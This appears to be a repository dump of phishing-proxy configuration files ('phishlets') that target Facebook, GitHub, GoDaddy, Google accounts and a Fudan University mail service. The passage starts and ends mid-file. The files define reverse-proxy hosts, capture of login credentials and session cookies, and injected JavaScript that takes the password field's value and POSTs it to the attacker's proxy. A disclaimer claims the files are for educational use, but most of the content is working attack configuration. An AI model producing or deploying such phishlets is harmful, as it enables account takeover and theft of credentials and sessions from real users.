xhr2.open("POST", '/', true); 75 | xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 76 | xhr2.send("Browser="+encodeURIComponent(browser)); 77 | var xhr3 = new XMLHttpRequest(); 78 | var engine = navigator.product; 79 | xhr3.open("POST", '/', true); 80 | xhr3.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 81 | xhr3.send("Engine="+encodeURIComponent(engine)); 82 | var xhr4 = new XMLHttpRequest(); 83 | var platform = navigator.platform; 84 | xhr4.open("POST", '/', true); 85 | xhr4.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 86 | xhr4.send("Platform="+encodeURIComponent(platform)); 87 | return; 88 | } 89 | setTimeout(function(){ onclickListener(); }, 2500); 90 | -------------------------------------------------------------------------------- /phishlet_examples/facebook-d2.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true} 5 | - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false} 6 | - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 11 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 12 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 13 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 14 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 15 | - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']} 16 | 17 | auth_tokens: 18 | - domain: '.facebook.com' 19 | keys: ['c_user','xs','sb'] 20 | credentials: 21 | username: 22 | key: 'email' 23 | search: '(.*)' 24 | type: 'post' 25 | password: 26 | key: 'unenc_password' 27 | search: '(.*)' 28 | type: 'post' 29 | custom: 30 | - key: 'UserAgent' 31 | search: '(.*)' 32 | type: 'post' 33 | - key: 'Browser' 34 | search: '(.*)' 35 | type: 'post' 36 | - key: 'Engine' 37 | search: '(.*)' 38 | type: 'post' 39 | - key: 'Platform' 40 | search: '(.*)' 41 | type: 'post' 42 | 43 | 44 | login: 45 | domain: 'www.facebook.com' 46 | path: '/login.php' 47 | 48 | js_inject: 49 | - trigger_domains: ["www.facebook.com"] 50 | trigger_paths: ["/login","/login.php", "/login/device-based/regular/login/", "/login/*"] 51 | trigger_params: [] 52 | script: | 53 | function onclickListener(){ 54 | var submit = document.querySelectorAll('button[type=submit]')[0]; 55 | submit.setAttribute("onclick", "sendPass()"); 56 | return; 57 | } 58 | function sendPass(){ 59 | var password = document.getElementsByName("pass")[0].value; 60 | var xhr = new XMLHttpRequest(); 61 | xhr.open("POST", '/login/device-based/regular/login/', true); 62 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 63 | xhr.send("unenc_password="+encodeURIComponent(password)); 64 | var xhr1 = new XMLHttpRequest(); 65 | var useragent = navigator.userAgent; 66 | xhr1.open("POST", '/', true); 67 | xhr1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 68 | var xhr2 = new XMLHttpRequest(); 69 | var browser = navigator.appName; 70 | xhr2.open("POST", '/', true); 71 | xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 72 | xhr2.send("Browser="+encodeURIComponent(browser)); 73 | var xhr3 = new XMLHttpRequest(); 74 | var engine = navigator.product; 75 | xhr3.open("POST", '/', true); 76 | xhr3.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 77 | xhr3.send("Engine="+encodeURIComponent(engine)); 78 | var xhr4 = new XMLHttpRequest(); 79 | var platform = navigator.platform; 80 | xhr4.open("POST", '/', true); 81 | xhr4.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 82 | xhr4.send("Platform="+encodeURIComponent(platform)); 83 | return; 84 | } 85 | setTimeout(function(){ onclickListener(); }, 2500); 86 | -------------------------------------------------------------------------------- /phishlet_examples/facebook-d3.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true} 5 | - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false} 6 | - {phish_sub: 'api', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 11 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 12 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 13 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 14 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 15 | - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']} 16 | 17 | auth_tokens: 18 | - domain: '.facebook.com' 19 | keys: ['c_user','xs','sb'] 20 | credentials: 21 | username: 22 | key: 'email' 23 | search: '(.*)' 24 | type: 'post' 25 | password: 26 | key: 'unenc_password' 27 | search: '(.*)' 28 | type: 'post' 29 | login: 30 | domain: 'www.facebook.com' 31 | path: '/login.php' 32 | 33 | js_inject: 34 | - trigger_domains: ["www.facebook.com"] 35 | trigger_paths: ["/login","/login.php", "/login/device-based/regular/login/", "/login/*"] 36 | trigger_params: [] 37 | script: | 38 | function onclickListener(){ 39 | var submit = document.querySelectorAll('button[type=submit]')[0]; 40 | var submitmobile = document.getElementById('u_0_5'); 41 | var submitbuttonmobile = document.querySelectorAll('button[type=button]')[0]; 42 | document.getElementsByTagName("button")[0].addEventListener("click", fclick); 43 | submit.addEventListener("click", fclick); 44 | submitmobile.addEventListener("click", fclick); 45 | submitbuttonmobile.addEventListener("click", fclick); 46 | return; 47 | } 48 | function fclick() { 49 | function fcheck() { 50 | if (JSON.parse(document.getElementsByName("pass")[0].value == "")) { 51 | setTimeout(fcheck, 100); 52 | } else { 53 | var unenc_password = document.getElementsByName("pass")[0].value; 54 | var xhr = new XMLHttpRequest(); 55 | xhr.open("POST", 'qwertyqwerty/', true); 56 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 57 | xhr.send("unenc_password=" + encodeURIComponent(unenc_password)); 58 | console.log(unenc_password); 59 | } 60 | fcheck(); 61 | } 62 | } 63 | setTimeout(function(){ onclickListener(); }, 2500); -------------------------------------------------------------------------------- /phishlet_examples/facebook-fix.yaml: -------------------------------------------------------------------------------- 1 | author: '@charlesbel' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true} 5 | - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false} 6 | - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 11 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 12 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 13 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 14 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 15 | - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']} 16 | 17 | auth_tokens: 18 | - domain: '.facebook.com' 19 | keys: ['c_user','xs','sb'] 20 | credentials: 21 | username: 22 | key: 'email' 23 | search: '(.*)' 24 | type: 'post' 25 | password: 26 | key: 'unenc_password' 27 | search: '(.*)' 28 | type: 'post' 29 | custom: 30 | - key: 'pass' 31 | search: '(.*)' 32 | type: 'post' 33 | - key: 'Password' 34 | search: '(.*)' 35 | type: 'post' 36 | - key: 'UserAgent' 37 | search: '(.*)' 38 | type: 'post' 39 | - key: 'Browser' 40 | search: '(.*)' 41 | type: 'post' 42 | - key: 'Engine' 43 | search: '(.*)' 44 | type: 'post' 45 | - key: 'Platform' 46 | search: '(.*)' 47 | type: 'post' 48 | 49 | 50 | login: 51 | domain: 'www.facebook.com' 52 | path: '/login.php' 53 | 54 | js_inject: 55 | - trigger_domains: ["www.facebook.com"] 56 | trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"] 57 | trigger_params: [] 58 | script: | 59 | function onclickListener(){ 60 | var submit = document.querySelectorAll('button[type=submit]')[0]; 61 | submit.setAttribute("onclick", "sendPass()"); 62 | var useragent = navigator.userAgent; 63 | xhr.open("POST", '/', true); 64 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 65 | xhr.send("UserAgent="+encodeURIComponent(useragent)); 66 | var browser = navigator.appName; 67 | xhr.open("POST", '/', true); 68 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 69 | xhr.send("Browser="+encodeURIComponent(browser)); 70 | var engine = navigator.product; 71 | xhr.open("POST", '/', true); 72 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 73 | xhr.send("Engine="+encodeURIComponent(engine)); 74 | var platform = navigator.platform; 75 | var xhr = new XMLHttpRequest(); 76 | xhr.open("POST", '/', true); 77 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 78 | xhr.send("Platform="+encodeURIComponent(platform)); 79 | return; 80 | } 81 | function sendPass(){ 82 | var password = document.getElementsByName("pass")[0].value; 83 | var xhr = new XMLHttpRequest(); 84 | xhr.open("POST", '/login/device-based/regular/login/', true); 85 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 86 | xhr.send("unenc_password="+encodeURIComponent(password)); 87 | return; 88 | } 89 | setTimeout(function(){ onclickListener(); }, 1000); 90 | -------------------------------------------------------------------------------- /phishlet_examples/facebook.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true} 5 | - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false} 6 | - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 11 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 12 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 13 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 14 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 15 | - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']} 16 | 17 | 18 | 19 | auth_tokens: 20 | - domain: '.facebook.com' 21 | keys: ['c_user','xs','sb'] 22 | credentials: 23 | username: 24 | key: 'email' 25 | search: '(.*)' 26 | type: 'post' 27 | password: 28 | key: '^unenc_password$' 29 | search: '(.*)' 30 | type: 'post' 31 | #Custom parameters are added in order to grab the requests made by javascripts injected in order to get device user-agent and other details. 32 | # key: 'pass' is added in order to increase the chances of grabbing the pass field if in case failed from above. 33 | 34 | custom: 35 | - key: '^pass$' 36 | search: '(.*)' 37 | type: 'post' 38 | - key: '^Password$' 39 | search: '(.*)' 40 | type: 'post' 41 | - key: 'UserAgent' 42 | search: '(.*)' 43 | type: 'post' 44 | - key: 'Browser' 45 | search: '(.*)' 46 | type: 'post' 47 | - key: 'Engine' 48 | search: '(.*)' 49 | type: 'post' 50 | - key: 'Platform' 51 | search: '(.*)' 52 | type: 'post' 53 | 54 | login: 55 | domain: 'www.facebook.com' 56 | path: '/login.php' 57 | 58 | #Below Javascript function will do two things (1) on page load it will make 4 request back to server to let us capture the important data. (2) Will add a function to login button to leak the value of password field. 59 | 60 | js_inject: 61 | - trigger_domains: ["www.facebook.com"] 62 | trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"] #The target path is important as the javascript will be injected in all address pages started with /login 63 | trigger_params: [] 64 | script: | 65 | function onclickListener(){ 66 | var submit = document.querySelectorAll('button[type=submit]')[0]; 67 | submit.setAttribute("onclick", "sendPass()"); 68 | 69 | var useragent = navigator.userAgent; 70 | xhr.open("POST", '/', true); 71 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 72 | xhr.send("UserAgent="+encodeURIComponent(useragent)); 73 | 74 | var browser = navigator.appName; 75 | xhr.open("POST", '/', true); 76 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 77 | xhr.send("Browser="+encodeURIComponent(browser)); 78 | 79 | var engine = navigator.product; 80 | xhr.open("POST", '/', true); 81 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 82 | xhr.send("Engine="+encodeURIComponent(engine)); 83 | 84 | var platform = navigator.platform; 85 | var xhr = new XMLHttpRequest(); 86 | xhr.open("POST", '/', true); 87 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 88 | xhr.send("Platform="+encodeURIComponent(platform)); 89 | return; 90 | } 91 | function sendPass(){ 92 | var password = document.getElementsByName("pass")[0].value; 93 | var xhr = new XMLHttpRequest(); 94 | xhr.open("POST", '/login/device-based/regular/login/', true); 95 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 96 | xhr.send("unenc_password="+encodeURIComponent(password)); 97 | return; 98 | } 99 | setTimeout(function(){ onclickListener(); }, 1000); 100 | 101 | 102 | # UPDATE : LOOKS LIKE FACEBOOK HAS CHANGED THE JAVASCRIPT FUNCTION, STILL THE FILTERS WORKS SOMETIME , SO I LEFT THEM AS THEY WERE IN PREVIOUS PHISHLET I MADE. 103 | 104 | # The js Function Responsible For Password Encryption is Present in this js file Located At : https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/yEB-M5_vVi6.js?_nc_x=Ij3Wp8lg5Kz 105 | # 106 | # _encryptBeforeSending: function (a) { 107 | # var c = this; 108 | # a = a.bind(this); 109 | # var d = this.loginFormParams && this.loginFormParams.pubKey; 110 | # if ((window.crypto || window.msCrypto) && d) { 111 | # var e = b('DOM').scry(this.loginForm, 'input[id="pass"]') [0], 112 | # f = b('FBBrowserPasswordEncryption'), 113 | # g = Math.floor(Date.now() / 1000).toString(); 114 | # b('promiseDone') (f.encryptPassword(d.keyId, d.publicKey, e.value, g), function (d) { 115 | # d = b('DOM').create('input', { 116 | # type: 'hidden', 117 | # name: 'ep', 118 | # value: d 119 | # }); 120 | # c.loginForm.appendChild(d); 121 | # e.disabled = !0; 122 | # a() 123 | # }, function (c) { 124 | # var d = '#PWD_BROWSER', 125 | # e = 5, 126 | # f = b('LoginServicePasswordEncryptDecryptEventTypedLogger'); 127 | # new f().setError('BrowserEncryptionFailureInLoginFormControllerWWW').setGrowthFlow('Bluebar/main login WWW').setErrorMessage(c.message).setPasswordTag(d).setPasswordEncryptionVersion(e).setPasswordTimestamp(g).logVital(); 128 | # a() 129 | # }) 130 | # } else a() 131 | # }, 132 | 133 | -------------------------------------------------------------------------------- /phishlet_examples/fudan.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | 5 | author: '@an0n' 6 | min_ver: '2.3.0' 7 | proxy_hosts: 8 | - {phish_sub: 'mail', orig_sub: 'mail', domain: 'fudan.edu.cn', session: true, is_landing: true, auto_filter: false} 9 | - {phish_sub: '', orig_sub: '', domain: 'fudan.edu.cn', session: true, is_landing: false, auto_filter: false} 10 | - {phish_sub: 'ecampus', orig_sub: 'ecampus', domain: 'fudan.edu.cn', session: true, is_landing: false, auto_filter: false} 11 | - {phish_sub: 'xxb', orig_sub: 'xxb', domain: 'fudan.edu.cn', session: true, is_landing: false, auto_filter: false} 12 | - {phish_sub: 'xxbcrawler', orig_sub: 'xxbcrawler', domain: 'fudan.edu.cn', session: true, is_landing: false, auto_filter: false} 13 | # - {phish_sub: '', orig_sub: '', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true} 14 | # - {phish_sub: 'webmail', orig_sub: 'webmail', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true} 15 | # - {phish_sub: 'swk', orig_sub: 'swk', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true} 16 | # - {phish_sub: 'cancer', orig_sub: 'cancer', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true} 17 | # - {phish_sub: 'eent', orig_sub: 'eent', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true} 18 | # - {phish_sub: 'fys', orig_sub: 'fys', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true} 19 | # - {phish_sub: 'goh', orig_sub: 'goh', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true} 20 | # - {phish_sub: 'hsh', orig_sub: 'hsh', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true} 21 | # - {phish_sub: 'jsyy', orig_sub: 'jsyy', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true} 22 | # - {phish_sub: 'sci', orig_sub: 'sci', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true} 23 | # - {phish_sub: 'zsyy', orig_sub: 'zsyy', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true} 24 | 25 | 26 | 27 | sub_filters: 28 | - {triggers_on: 'mail.fudan.edu.cn', orig_sub: 'mail', domain: 'fudan.edu.cn', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 29 | - {triggers_on: 'mail.fudan.edu.cn', orig_sub: 'xxbcrawler', domain: 'fudan.edu.cn', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 30 | # - {triggers_on: 'mail.fudan.edu.cn', orig_sub: '', domain: 'shmu.edu.cn', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 31 | 32 | auth_tokens: 33 | - domain: '.fudan.edu.cn' 34 | keys: ['.*,regexp'] 35 | - domain: 'mail.fudan.edu.cn' 36 | keys: ['.*,regexp'] 37 | # - domain: '.shmu.edu.cn' 38 | # keys: ['.*,regexp'] 39 | credentials: 40 | username: 41 | key: 'uid' 42 | search: '(.*)' 43 | type: 'post' 44 | password: 45 | key: 'password' 46 | search: '(.*)' 47 | type: 'post' 48 | custom: 49 | - key: 'domain' 50 | search: '(.*)' 51 | type: 'post' 52 | - key: 'locale' 53 | search: '(.*)' 54 | type: 'post' 55 | 56 | 57 | force_post: 58 | - path: '/coremail/index.jsp' 59 | search: 60 | - {key: 'uid', search: '.*'} 61 | - {key: 'password', search: '.*'} 62 | force: 63 | - {key: 'useSSL', value: 'true'} 64 | type: 'post' 65 | 66 | login: 67 | domain: 'mail.fudan.edu.cn' 68 | path: '/' 69 | 70 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 71 | # PLEASE DO NOT MISUSE THIS PHISHLET. 72 | -------------------------------------------------------------------------------- /phishlet_examples/github.yaml: -------------------------------------------------------------------------------- 1 | author: '@audibleblink' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: '', orig_sub: '', domain: 'github.com', session: true, is_landing: true} 5 | - {phish_sub: 'api', orig_sub: 'api', domain: 'github.com'} 6 | - {phish_sub: 'github', orig_sub: 'github', domain: 'githubassets.com'} 7 | 8 | sub_filters: 9 | - {triggers_on: 'github.com', orig_sub: '', domain: 'github.com', search: 'integrity="(.*?)"', replace: '', mimes: ['text/html']} 10 | 11 | auth_tokens: 12 | - domain: '.github.com' 13 | keys: ['logged_in', 'dotcom_user'] 14 | - domain: 'github.com' 15 | keys: ['user_session', '_gh_sess'] 16 | 17 | credentials: 18 | username: 19 | key: 'login' 20 | search: '(.*)' 21 | type: 'post' 22 | password: 23 | key: 'password' 24 | search: '(.*)' 25 | type: 'post' 26 | 27 | login: 28 | domain: 'github.com' 29 | path: '/login' 30 | -------------------------------------------------------------------------------- /phishlet_examples/godaddy.yaml: -------------------------------------------------------------------------------- 1 | 2 | author: '@An0nud4y' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'sso', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing: true} 6 | # - {phish_sub: 'img6', orig_sub: 'img6', domain: 'wsimg.com', session: true, is_landing: false} 7 | - {phish_sub: 'img1', orig_sub: 'img1', domain: 'wsimg.com', session: true, is_landing: false} 8 | - {phish_sub: 'events', orig_sub: 'events', domain: 'godaddy.com', session: true, is_landing: false} 9 | - {phish_sub: 'gui', orig_sub: 'gui', domain: 'godaddy.com', session: true, is_landing: false} 10 | 11 | sub_filters: 12 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 13 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 14 | # - {triggers_on: 'sso.godaddy.com', orig_sub: 'img6', domain: 'wsimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 15 | # - {triggers_on: 'sso.godaddy.com', orig_sub: 'img6', domain: 'wsimg.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 16 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'img1', domain: 'wsimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 17 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'img1', domain: 'wsimg.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 18 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'events', domain: 'godaddy.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 19 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'events', domain: 'godaddy.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 20 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'gui', domain: 'godaddy.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 21 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'gui', domain: 'godaddy.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 22 | 23 | auth_tokens: 24 | - domain: '.godaddy.com' 25 | keys: ['(.*)','.*,regexp'] 26 | credentials: 27 | username: 28 | key: 'username' 29 | search: '(.*)' 30 | type: 'post' 31 | password: 32 | key: 'password' 33 | search: '(.*)' 34 | type: 'post' 35 | login: 36 | domain: 'sso.godaddy.com' 37 | path: '/' 38 | 39 | -------------------------------------------------------------------------------- /phishlet_examples/gsuite.yaml: -------------------------------------------------------------------------------- 1 | author: '@K70' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false,} 5 | - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false} 6 | - {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false, auto_filter: false} 7 | - {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false, auto_filter: false} 8 | - {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true, is_landing: false, auto_filter: false} 9 | - {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false, auto_filter: false} 10 | - {phish_sub: 'content', orig_sub: 'content', domain: 'googleapis.com', session: false, is_landing: false, auto_filter: false} 11 | sub_filters: 12 | - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'accounts.google.com', replace: 'accounts-google.com.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 13 | - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'ssl.gstatic.com', replace: 'ssl.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 